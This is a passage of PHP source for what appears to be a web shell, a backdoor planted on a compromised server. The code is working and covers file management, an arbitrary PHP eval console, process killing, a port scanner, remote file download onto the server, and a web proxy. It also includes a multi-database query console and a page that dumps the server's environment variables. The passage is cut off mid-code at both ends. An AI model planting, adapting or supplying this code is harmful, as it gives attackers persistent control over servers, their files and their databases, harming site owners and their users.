			$buff .= "<tr><td><a href=\"?d=".$parent."\">[ $folder ]</a></td><td>LINK</td><td style=\"text-align:center;\">".$owner."</td><td style=\"text-align:center;\">".gp($parent)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",filemtime($parent))."</td><td><span id=\"titik2\"><a href=\"?d=$pwd&amp;new=".$parent."\">newfile</a> | <a href=\"javascript:swap('titik2','titik2_form');\">newfolder</a> | <a href=\"?upload&amp;d=$parent\">upload</a></span>
			<form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"get\" id=\"titik2_form\" class=\"hide\" style=\"margin:0;padding:0;\">
						<input class=\"inputz\" id=\"titik2_\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
			<input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
			</form>
			</td></tr>";
		}
		else {
			$buff .= "<tr><td><a id=\"".cs($folder)."_link\" href=\"?d=".$pwd.$folder.DIRECTORY_SEPARATOR."\">[ $folder ]</a>
			<form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\" id=\"".cs($folder)."_form\" class=\"hide\" style=\"margin:0;padding:0;\">
			<input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
						<input class=\"inputz\" style=\"width:200px;\" id=\"".cs($folder)."_link_\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
			<input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
			<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"swap('".cs($folder)."_form','".cs($folder)."_link');\" />
			</form>
			<td>DIR</td><td style=\"text-align:center;\">".$owner."</td><td style=\"text-align:center;\">".gp($pwd.$folder)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",filemtime($folder))."</td><td><a href=\"javascript:swap('".cs($folder)."_link','".cs($folder)."_form');\">rename</a> | <a href=\"?d=".$pwd."&amp;rmdir=".$pwd.$folder."\">delete</a> | <a href=\"?upload&amp;d=".$pwd.$folder."\">upload</a></td></tr>";
		}
	}

	foreach($fname as $file){
		$full = $pwd.$file;
		if(!$win && $posix){
			$name = posix_getpwuid(fileowner($full));
			$group = posix_getgrgid(filegroup($full));
			$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
		}
		else {
			$owner = $user;
		}
		$buff .= "<tr><td><a id=\"".cs($file)."_link\" href=\"?view=$full\">$file</a>
		<form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\" id=\"".cs($file)."_form\" class=\"hide\" style=\"margin:0;padding:0;\">
		<input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
				<input class=\"inputz\" style=\"width:200px;\" type=\"text\" id=\"".cs($file)."_link_\" name=\"newname\" value=\"".$file."\" />
		<input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
		<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"swap('".cs($file)."_link','".cs($file)."_form');\" />
		</form>
		</td><td>".gs($full)."</td><td style=\"text-align:center;\">".$owner."</td><td style=\"text-align:center;\">".gp($full)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",filemtime($full))."</td>
		<td><a href=\"?edit=$full\">edit</a> | <a href=\"javascript:swap('".cs($file)."_link','".cs($file)."_form');\">rename</a> | <a href=\"?delete=$full\">delete</a> | <a href=\"?dl=$full\">download</a>&nbsp;(<a href=\"?dlgzip=$full\">gzip</a>)</td></tr>";
	}
	$buff .= "</table>";
	return $buff;
}
function file_newname($path, $filename){
    if ($pos = strrpos($filename, '.')) {
           $name = substr($filename, 0, $pos);
           $ext = substr($filename, $pos);
    } else {
           $name = $filename;
    }

    $newpath = $path.'/'.$filename;
    $newname = $filename;
    $counter = 0;
    while (file_exists($newpath)) {
           $newname = $name .'_'. $counter . $ext;
           $newpath = $path.'/'.$newname;
           $counter++;
     }

    return $newname;
}

if($s_auth){
	$s_software = getenv("SERVER_SOFTWARE");
	if (ini_get("safe_mode") or strtolower(ini_get("safe_mode")) == "on") $s_safemode = TRUE; else $s_safemode = FALSE;
	$s_system = php_uname();
	$s_win = FALSE;
	if(strtolower(substr($s_system,0,3)) == "win") $s_win = TRUE;
	$letters = '';
	if(!$s_win){
		if(!$s_user = rp(exe("whoami"))) $s_user = "";
		if(!$s_id = rp(exe("id"))) $s_id = "";
		$pwd = getcwd().DIRECTORY_SEPARATOR;
	} else {
		$s_user = get_current_user();
		$s_id = $s_user;
		$pwd = realpath(".")."\\";
	 	$v = explode("\\",$d);
		$v = $v[0];
		foreach (range("A","Z") as $letter){
			$bool = @is_dir($letter.":\\");
			if ($bool){
				$letters .= "<a class=letter href=\"?d=".$letter.":\\\">";
				if ($letter.":" != $v) {$letters .= $letter;}
				else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
				$letters .= ":</a> ";
			}
		}
	}
	$s_prompt = $s_user." &gt;";

	if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $s_posix = TRUE;
	else $s_posix = FALSE;

	$s_server_ip = gethostbyname($_SERVER["HTTP_HOST"]);
	$s_my_ip = $_SERVER['REMOTE_ADDR'];

	if(isset($_REQUEST['d'])){
		$d = ss($_REQUEST['d']);
		if(is_dir($d)){
			chdir($d);
			$pwd = cp($d);
			$_SESSION['dir']=$pwd;
		}
		
	}else
	if(isset($_SESSION['dir'])){
		$d = ss($_SESSION['dir']);
		if(is_dir($d)){
			chdir($d);
			$pwd = cp($d);
		}
	}else $pwd = cp(getcwd());
	if(isset($_REQUEST['dl']) && ($_REQUEST['dl'] != "")){
		$f = ss($_REQUEST['dl']);
		$fc = file_get_contents($f);
		header("Content-type: application/octet-stream");
		header("Content-length: ".strlen($fc));
		header("Content-disposition: attachment; filename=\"".basename($f)."\";");
		echo $fc;
		exit;
	}elseif(isset($_REQUEST['dlgzip']) && ($_REQUEST['dlgzip'] != "")){
		$f = ss($_REQUEST['dlgzip']);
		$fc = gzencode(file_get_contents($f));
		header("Content-Type:application/x-gzip\n");
		header("Content-length: ".strlen($fc));
		header("Content-disposition: attachment; filename=\"".basename($f).".gz\";");
		echo $fc;
		exit;
	}
	if(isset($_REQUEST['pid'])){
		$p = ss($_REQUEST['pid']);
		if(function_exists("posix_kill")) posix_kill($p,'9');
		else{
			exe("kill -9 ".$p);
			exe("taskkill /F /PID ".$p);
		}
	}
	if(isset($_REQUEST['img'])){
		ob_clean();
		$f = ss($_REQUEST['img']);
		$inf = getimagesize($f);
		$ext = explode($f,".");
		$ext = $ext[count($ext)-1];
	 	header("Content-type: ".$inf["mime"]);
	 	header("Cache-control: public");
		header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
		header("Cache-control: max-age=".(60*60*24*7));
	 	readfile($f);
	 	exit;
	}
	if(isset($_REQUEST['rename']) && isset($_REQUEST['oldname']) && isset($_REQUEST['newname'])){
		$old = ss($_REQUEST['oldname']);
		$new = ss($_REQUEST['newname']);
		rename($pwd.$old,$pwd.$new);
		$fnew = $pwd.$new;
	}
	if(isset($_REQUEST['delete']) && ($_REQUEST['delete'] != "")){
		$f = ss($_REQUEST['delete']);
		if(is_file($f)) unlink($f);
	}else
	if(isset($_REQUEST['rmdir']) && ($_REQUEST['rmdir'] != "")){
		$f = ss(rtrim(ss($_REQUEST['rmdir'],DIRECTORY_SEPARATOR)));
		if(is_dir($f)) rmdirs($f);
	}else
	if(isset($_REQUEST['mkdir']) && ($_REQUEST['mkdir'] != "")){
		$f = ss($pwd.ss($_REQUEST['mkdir']));
		if(!is_dir($f)) mkdir($f);
	}
	
	function result(){
		global $pwd,$s_prompt,$s_win,$nd;	
		if(isset($_REQUEST['info'])){
			?><h2>Server Information</h2>
			<table><?php
			foreach($_SERVER+$_ENV as $key => $value){
				?><tr><td><?php echo ucwords(strtolower(str_replace("_"," ",$key))); ?></td><td><?php echo $value; ?></td></tr><?php
			}
			?></table><?php
		}else
		if(isset($_REQUEST['scan'])){
			
			function checkport($ip,$port,$timeout,$type=0){
				if(!$type){
					$scan=@fsockopen($ip,$port,$n,$s,$timeout);
					if($scan){
						fclose($scan);
						return 1;
					}
				}
				elseif(function_exists('socket_set_timeout')){
					$scan=@fsockopen("udp://".$ip,$port);
					if($scan){
						socket_set_timeout($scan,$timeout);
						@fwrite($scan,"\x00");
						$s=time();
						fread($scan,1);
						if((time()-$s)>=$timeout){
							fclose($scan);
							return 1;
						}
					}
				}
				return 0;
			}
			
			if (!empty($_SERVER["SERVER_ADDR"])) $host=$_SERVER["SERVER_ADDR"];
			else $host ="127.0.0.1";
			$udp=(empty($_REQUEST['udp']))?0:1;
			$tcp=(empty($_REQUEST['tcp']))?0:1;
			if (($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){
				$target=$_REQUEST['target'];
				$from=(int)$_REQUEST['fromport'];
				$to=(int)$_REQUEST['toport'];
				$timeout=(int)$_REQUEST['timeout'];
				$nu = 0;
				?><h2>Port scanning started against <?php echo htmlspecialchars($target); ?></h2><?php
				$start=time();
				?><table><thead><th></th><th>Port</th><th>Service</th><th>Protocol</th></thead><tbody><?php
				for($i=$from;$i<=$to;$i++){
					if($tcp)if (checkport($target,$i,$timeout)){
						$nu++;
						$ser="";
						if(getservbyport($i,"tcp"))$ser="(".getservbyport($i,"tcp").")";
						?><tr><td><? echo $nu; ?></td><td><?php echo $i; ?></td><td><?php echo $ser; ?></td><td>[TCP] (<a href="telnet://<?php $target.":".$i;?>">Connect</a>)</td></tr><?php
					}
					if($udp)if(checkport($target,$i,$timeout,1)){
						$nu++;
						$ser="";
						if(getservbyport($i,"udp")){
							$ser="(".getservbyport($i,"udp").")";
						}
						?><tr><td><?php echo $nu; ?></td><td><?php echo $i; ?></td><td><?php echo $ser; ?></td><td>[UDP]</td></tr><?php
					}
				}
				?></tbody></table><?php
				$time=time()-$start;
				?>Done! (<?php echo $time; ?> seconds)<hr/><?php
			}
			$chbox=(extension_loaded('sockets'))?"<div><label>Protocol</label><span><input type=checkbox name=tcp value=1 checked>TCP<br><input type=checkbox name=udp value=1 checked>UDP</span></div>":"<input type=hidden name=tcp value=1>";
			?><div class=box><form method="POST">
				<h2>Port scanner</h2>
				<div><label>Target</label><input name=target value="<?php echo $host; ?>" size=40></div>
				<div><label>From</label><input name=fromport type=text value="1" size=5><br/></div>
				<div><label>To</label><input name=toport type=text value="1024" size=5><br/></div>
				<div><label>Timeout</label><input name=timeout type=text value="2" size=5><br/></div>
				<?php echo $chbox; ?>
				<span class=rside><input type=submit name=portscanner value=Scan></span>
				</form>
				</div><?php
	
		}else
		if(isset($_REQUEST['calc'])){
			$fu = array('md5','sha1','crc32','hex','ip2long','long2ip','base64_encode','base64_decode','urldecode','urlencode','gzdeflate','gzinflate');
			if (!empty($_REQUEST['input']) && (in_array($_REQUEST['to'],$fu))){
				?><h2>Output</h2><textarea class="code"><?php
				if($_REQUEST['to']=='hex') for($i=0;$i<strlen($_REQUEST['input']);$i++)echo strtoupper(dechex(ord($_REQUEST['input']{$i})));
				else echo htmlspecialchars($_REQUEST['to']($_REQUEST['input']));
				?></textarea><?php
			}
			?><div class="box">
			<h2>Convertor</h2>
			<form action="<?php echo $_SERVER['PHP_SELF']; ?>?calc" method="POST">
			<label>Input</label><textarea name=input><?php
			if(!empty($_REQUEST['input']))echo htmlspecialchars($_REQUEST['input']);
			?></textarea><br/>
			<label>Task</label><select name=to>
				<option value=md5>MD5</option>
				<option value=sha1>SHA1</option>
				<option value=crc32>crc32</option>
				<option value=ip2long>IP to long</option>
				<option value=long2ip>Long to IP</option>
				<option value=hex>HEX</option>
				<option value=urlencode>URL encoding</option>
				<option value=urldecode>URL decoding</option>
				<option value=base64_encode>Base64 encoding</option>
				<option value=base64_decode>Base64 decoding</option>
				<option value=gzdeflate>Gzdeflate</option>
				<option value=gzinflate>Gzinflate</option>
			</select><br/>
			<span class="rside"><input class=buttons type=submit value=Convert></span>
			</form></div><?php
		}else
		if(isset($_REQUEST['proxy'])){
			?><div class=box>
				<h2>Web Proxy</h2>
				<form method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>" id="proxy_form" target="_blank">
					<input type="hidden" name="proxy_action" value="redirect_browse" />
					<div><label>URL</label><input type="text" name="proxy_new_url" value="http://" id="new_url" /></div>
					<div><label>Option</label><div>
						<input type="checkbox" name="proxy_no_javascript" id="proxy_no_javascript" />
						Disable JavaScript<br/>
						<input type="checkbox" name="proxy_no_images" id="proxy_no_images" />
						Disable Images<br/>
						<input type="checkbox" name="proxy_no_title" id="proxy_no_title" />
						Block Title<br/>
						<input type="checkbox" name="proxy_no_meta" id="proxy_no_meta" />
						Block Meta
						</div>
					</div>
					<span class=rside><input type="submit" value="Browse" id="proxy_button" /></span>						
				</form>
			</div><?php
		}else
		if(isset($_REQUEST['tools'])){
			echo "not implemented yet!";
		}else
		if(isset($_REQUEST['eval'])){
			$c = "";
			if(isset($_REQUEST['evalcode'])){
				$eval_addition = "error_reporting(E_ALL);@ini_set(\"display_errors\", 1);";
				$c = ss($_REQUEST['evalcode']);
				ob_start();
				eval(eval($eval_addition) . eval($c));
				$b = ob_get_contents();
				ob_end_clean();
				$code = $b;
				?><h2>Output</h2><pre class=code><?php echo htmlspecialchars($code); ?></pre><?php
			}
			?><h2>Code</h2><form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
					<textarea id="eval" name="evalcode" class="code"><?php echo htmlspecialchars($_REQUEST['evalcode']); ?></textarea>
					<span class="rside"><input type="submit" name="eval" value="Go !" /></span>
					</form><?php
		}else
		if(isset($_REQUEST['upload'])){
			$msg = "";
			if(isset($_REQUEST['uploadhd'])){
				$fn = $_FILES['filepath']['name'];
				if(is_uploaded_file($_FILES['filepath']['tmp_name'])){
					$p = cp(ss($_REQUEST['savefolder']));
					if(!is_dir($p)) $p = cp(dirname($p));
					if(isset($_REQUEST['savefilename']) && (trim($_REQUEST['savefilename'])!="")) $fn = ss($_REQUEST['savefilename']);
					$tm = $_FILES['filepath']['tmp_name'];
					$pi = cp($p).$fn;
					$st = move_uploaded_file($tm,$pi);
					if($st)	$msg = "<p class=\"rs_result\">file uploaded to <a href=\"?d=".$pwd."&amp;view=".$pi."\">".$pi."</a></p>";
					else $msg = "<p class=\"rs_result\">failed to upload ".$fn."</p>";
				}
				else $msg = "<p class=\"rs_result\">failed to upload ".$fn."</p>";
			}
			elseif(isset($_REQUEST['uploadurl'])){
				$p = cp(ss($_REQUEST['savefolderurl']));
				if(!is_dir($p)) $p = cp(dirname($p));
				$fu = ss($_REQUEST['fileurl']);
				$fn = basename($fu);
				if(isset($_REQUEST['savefilenameurl']) && (trim($_REQUEST['savefilenameurl'])!="")) $fn = ss($_REQUEST['savefilenameurl']);
				$fp = cp($p).$fn;
				$st = dlfile($fu,$fp);
				if($st) $msg = "<p class=\"rs_result\">file uploaded to <a href=\"?d=".$pwd."&amp;view=".$fp."\">".$fp."</a></p>";
				else $msg = "<p class=\"rs_result\">failed to upload ".$fn."</p>";
			}	
	
			echo $msg;
			?>
			<form action="<?php echo $_SERVER['PHP_SELF']; ?>?upload" method="post" enctype="multipart/form-data">
			<div class="box"><h2>Upload from computer</h2>
			<div><label>File</label><input type="file" name="filepath" /></div>
			<div><label>Save to</label><input type="text" name="savefolder" value="<?php echo $pwd; ?>" /></div>
			<div><label>Filename (optional)</label><input type="text" name="savefilename" value="" /></div>
			<span class=rside><input type="submit" name="uploadhd"  value="Upload !" /></span>
			</div>
			</form>
	
			<form action="<?php echo $_SERVER['PHP_SELF']; ?>?upload" method="post">
			<div class="box"><h2>Upload from internet</h2>
			<div><label>File URL</label><input type="text" name="fileurl" value="" /></div>
			<div><label>Save to</label><input type="text" name="savefolderurl" value="<?php echo $pwd; ?>" /></div>
			<div><label>Filename (optional)</label><input type="text" name="savefilenameurl" value="" /></div>
			<span class=rside><input type="submit" name="uploadurl" value="Upload !" /></span>
			</div>
			</form><?php
		}else
		if(isset($_REQUEST['db'])){
			
			ignore_user_abort(true);
			$sqlhost = $sqlhost1 = $sqlhost2 = $sqlhost3 = $sqlhost4 = 'localhost';
			$sqluser = $sqluser1 = $sqluser2 = $sqluser3 = $sqluser4 = $odbcuser = $odbcdsn = $pdodsn = $pdouser = '';
			$sqlport = $sqlport1 = $sqlport2 = $sqlport3 = $sqlport4 = '';
			$sqlpass = $sqlpass1 = $sqlpass2 = $sqlpass3 = $sqlpass4 = $odbcpass = $pdopass = '';
	
			if(isset($_REQUEST['mysqlcon'])&&isset($_REQUEST['sqlhost1'])) $sqlhost = $sqlhost1 = ss($_REQUEST['sqlhost1']);
			if(isset($_REQUEST['mssqlcon'])&&isset($_REQUEST['sqlhost2'])) $sqlhost = $sqlhost2 = ss($_REQUEST['sqlhost2']);
			if(isset($_REQUEST['pgsqlcon'])&&isset($_REQUEST['sqlhost3'])) $sqlhost = $sqlhost3 = ss($_REQUEST['sqlhost3']);
			if(isset($_REQUEST['oraclecon'])&&isset($_REQUEST['sqlhost4'])) $sqlhost = $sqlhost4 = ss($_REQUEST['sqlhost4']);
			if(isset($_REQUEST['odbccon'])&&isset($_REQUEST['odbcdsn'])) $odbcdsn = ss($_REQUEST['odbcdsn']);
			if(isset($_REQUEST['pdocon'])&&isset($_REQUEST['pdodsn'])) $pdodsn = ss($_REQUEST['pdodsn']);
			if(isset($_REQUEST['sqlhost'])) $sqlhost = ss($_REQUEST['sqlhost']);
	
			if(isset($_REQUEST['mysqlcon'])&&isset($_REQUEST['sqluser1'])) $sqluser = $sqluser1 = ss($_REQUEST['sqluser1']);
			if(isset($_REQUEST['mssqlcon'])&&isset($_REQUEST['sqluser2'])) $sqluser = $sqluser2 = ss($_REQUEST['sqluser2']);
			if(isset($_REQUEST['pgsqlcon'])&&isset($_REQUEST['sqluser3'])) $sqluser = $sqluser3 = ss($_REQUEST['sqluser3']);
			if(isset($_REQUEST['oraclecon'])&&isset($_REQUEST['sqluser4'])) $sqluser = $sqluser4 = ss($_REQUEST['sqluser4']);
			if(isset($_REQUEST['odbccon'])&&isset($_REQUEST['odbcuser'])) $odbcuser = ss($_REQUEST['odbcuser']);
			if(isset($_REQUEST['pdocon'])&&isset($_REQUEST['pdouser'])) $pdouser = ss($_REQUEST['pdouser']);
			if(isset($_REQUEST['sqluser'])) $sqluser = ss($_REQUEST['sqluser']);
	
			if(isset($_REQUEST['mysqlcon'])&&isset($_REQUEST['sqlport1'])) $sqlport = $sqlport1 = ss($_REQUEST['sqlport1']);
			if(isset($_REQUEST['mssqlcon'])&&isset($_REQUEST['sqlport2'])) $sqlport = $sqlport2 = ss($_REQUEST['sqlport2']);
			if(isset($_REQUEST['pgsqlcon'])&&isset($_REQUEST['sqlport3'])) $sqlport = $sqlport3 = ss($_REQUEST['sqlport3']);
			if(isset($_REQUEST['oraclecon'])&&isset($_REQUEST['sqlport4'])) $sqlport = $sqlport4 = ss($_REQUEST['sqlport4']);
			if(isset($_REQUEST['sqlport'])) $sqlport = ss($_REQUEST['sqlport']);
	
			if(isset($_REQUEST['mysqlcon'])&&isset($_REQUEST['sqlpass1'])) $sqlpass = $sqlpass1 = ss($_REQUEST['sqlpass1']);
			if(isset($_REQUEST['mssqlcon'])&&isset($_REQUEST['sqlpass2'])) $sqlpass = $sqlpass2 = ss($_REQUEST['sqlpass2']);
			if(isset($_REQUEST['pgsqlcon'])&&isset($_REQUEST['sqlpass3'])) $sqlpass = $sqlpass3 = ss($_REQUEST['sqlpass3']);
			if(isset($_REQUEST['oraclecon'])&&isset($_REQUEST['sqlpass4'])) $sqlpass = $sqlpass4 = ss($_REQUEST['sqlpass4']);
			if(isset($_REQUEST['odbccon'])&&isset($_REQUEST['odbcpass'])) $odbcpass = ss($_REQUEST['odbcpass']);
			if(isset($_REQUEST['pdocon'])&&isset($_REQUEST['pdopass'])) $pdopass = ss($_REQUEST['pdopass']);
			if(isset($_REQUEST['sqlpass'])) $sqlpass = ss($_REQUEST['sqlpass']);
	
			$sqls = "";
			$q_result = "";
			$hostandport = $sqlhost;
			if(trim($sqlport)!="") $hostandport = $sqlhost.":".$sqlport;
	
			if(isset($_REQUEST['mysqlcon']) && ($con = mysql_connect($hostandport,$sqluser,$sqlpass))){
				if(isset($_REQUEST['sqlcode'])){
					$sqls = ss($_REQUEST['sqlcode']);
					$querys = explode(";",$sqls);
	
					foreach($querys as $query){
					 if(trim($query) != ""){
						$hasil = mysql_query($query);
						if($hasil){
							$q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
							<span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
							<table class=\"explore\" style=\"width:99%;\"><tr>";
							for($i=0;$i<mysql_num_fields($hasil);$i++)
								$q_result .= "<th>".htmlspecialchars(mysql_field_name($hasil,$i))."</th>";
							$q_result .= "</tr>";
							while($rows=mysql_fetch_array($hasil)){
								$q_result .= "<tr>";
								for($j=0;$j<mysql_num_fields($hasil);$j++)
								{
									if($rows[$j] == "") $dataz = " ";
									else $dataz = $rows[$j];
									$q_result .= "<td>".htmlspecialchars($dataz)."</td>";
								}
								$q_result .= "</tr>";
							}
							$q_result .= "</table>";
						}
						else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
								<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
					 }
					}
				}
				else $sqls = "SHOW databases;";
	
				echo "	<form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
						<input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
						<input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
						<input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
						<input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
											<textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">".$sqls."</textarea>
						<p><input type=\"submit\" name=\"mysqlcon\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
						&nbsp;&nbsp;Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
						</form>";
				echo "<div>".$q_result."</div>";
				if($con) mysql_close($con);
			}
			elseif(isset($_REQUEST['mssqlcon']) && ($con = mssql_connect($hostandport,$sqluser,$sqlpass))){
				if(isset($_REQUEST['sqlcode'])){
					$sqls = ss($_REQUEST['sqlcode']);
					$querys = explode(";",$sqls);
	
					foreach($querys as $query){
					 if(trim($query) != ""){
						$hasil = mssql_query($query);
						if($hasil){
							$q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
							<span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
							<table class=\"explore\" style=\"width:99%;\"><tr>";
							for($i=0;$i<mssql_num_fields($hasil);$i++)
								$q_result .= "<th>".htmlspecialchars(mssql_field_name($hasil,$i))."</th>";
							$q_result .= "</tr>";
							while($rows=mssql_fetch_array($hasil)){
								$q_result .= "<tr>";
								for($j=0;$j<mssql_num_fields($hasil);$j++)
								{
									if($rows[$j] == "") $dataz = " ";
									else $dataz = $rows[$j];
									$q_result .= "<td>".htmlspecialchars($dataz)."</td>";
								}
								$q_result .= "</tr>";
							}
							$q_result .= "</table>";
						}
						else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
								<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
					 }
					}
				}
				else $sqls = "EXEC sp_databases;";
	
				echo "	<form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
						<input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
						<input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
						<input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
						<input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
											<textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">".$sqls."</textarea>
						<p><input type=\"submit\" name=\"mssqlcon\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
						&nbsp;&nbsp;Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
						</form>";
				echo "<div>".$q_result."</div>";
				if($con) mssql_close($con);
			}
			elseif(isset($_REQUEST['oraclecon']) && ($con = oci_connect($sqluser,$sqlpass,$hostandport))){
				if(isset($_REQUEST['sqlcode'])){
					$sqls = ss($_REQUEST['sqlcode']);
					$querys = explode(";",$sqls);
	
					foreach($querys as $query){
					 if(trim($query) != ""){
						$st = oci_parse($con, $query);
						if(oci_execute($st)){
							$q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
							<span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
							<table class=\"explore\" style=\"width:99%;\"><tr>";
							for($i=1;$i<=oci_num_fields($st);$i++)
								$q_result .= "<th>".htmlspecialchars(oci_field_name($st,$i))."</th>";
						
							$q_result .= "</tr>";
						
							while($rows=oci_fetch_array($st)){
								$q_result .= "<tr>";
								for($j=0;$j<oci_num_fields($st);$j++)
								{
									if($rows[$j] == "") $dataz = " ";
									else $dataz = $rows[$j];
									$q_result .= "<td>".htmlspecialchars($dataz)."</td>";
								}
								$q_result .= "</tr>";
							}
							$q_result .= "</table>";
						}
						else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
								<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
					 }
					}
				}
				else $sqls = "SELECT * FROM user_tablespaces;";
	
				echo "	<form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
						<input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
						<input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
						<input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
						<input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
											<textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">".$sqls."</textarea>
						<p><input type=\"submit\" name=\"oraclecon\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
						&nbsp;&nbsp;Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
						</form>";
				echo "<div>".$q_result."</div>";
				if($con) oci_close($con);
			}
			elseif(isset($_REQUEST['pgsqlcon']) && ($con = pg_connect("host=$sqlhost user=$sqluser password=$sqlpass port=$sqlport"))){
				if(isset($_REQUEST['sqlcode'])){
					$sqls = ss($_REQUEST['sqlcode']);
					$querys = explode(";",$sqls);
	
					foreach($querys as $query){
					 if(trim($query) != ""){
						$hasil = pg_query($query);
						if($hasil){
							$q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
							<span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
							<table class=\"explore\" style=\"width:99%;\"><tr>";
							for($i=0;$i<pg_num_fields($hasil);$i++)
								$q_result .= "<th>".htmlspecialchars(pg_field_name($hasil,$i))."</th>";
							$q_result .= "</tr>";
						
							while($rows=pg_fetch_array($hasil)){
								$q_result .= "<tr>";
								for($j=0;$j<pg_num_fields($hasil);$j++)
								{
									if($rows[$j] == "") $dataz = " ";
									else $dataz = $rows[$j];
									$q_result .= "<td>".htmlspecialchars($dataz)."</td>";
								}
								$q_result .= "</tr>";
							}
							$q_result .= "</table>";
						}
						else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
								<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
					 }
					}
				}
			}
			elseif(isset($_REQUEST['odbccon']) && ($con = odbc_connect($odbcdsn,$odbcuser,$odbcpass))){
				if(isset($_REQUEST['sqlcode'])){
					$sqls = ss($_REQUEST['sqlcode']);
					$querys = explode(";",$sqls);
	
					foreach($querys as $query){
					 if(trim($query) != ""){
						$hasil = odbc_exec($con, $query);
						if($hasil){
							$q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
							<span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
							<table class=\"explore\" style=\"width:99%;\"><tr>";
							for($i=1;$i<=odbc_num_fields($hasil);$i++)
								$q_result .= "<th>".htmlspecialchars(odbc_field_name($hasil,$i))."</th>";
							$q_result .= "</tr>";
						
							while($rows=odbc_fetch_array($hasil)){
								$q_result .= "<tr>";
								foreach($rows as $r)
								{
									if($r == "") $dataz = " ";
									else $dataz = $r;
									$q_result .= "<td>".htmlspecialchars($dataz)."</td>";
								}
								$q_result .= "</tr>";
							}
							$q_result .= "</table>";
						}
						else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
								<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
					 }
					}
				}		
				else $sqls = "";
	
				echo "	<form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
						<input type=\"hidden\" name=\"odbcdsn\" value=\"".$odbcdsn."\" />
						<input type=\"hidden\" name=\"odbcuser\" value=\"".$odbcuser."\" />
						<input type=\"hidden\" name=\"odbcpass\" value=\"".$odbcpass."\" />
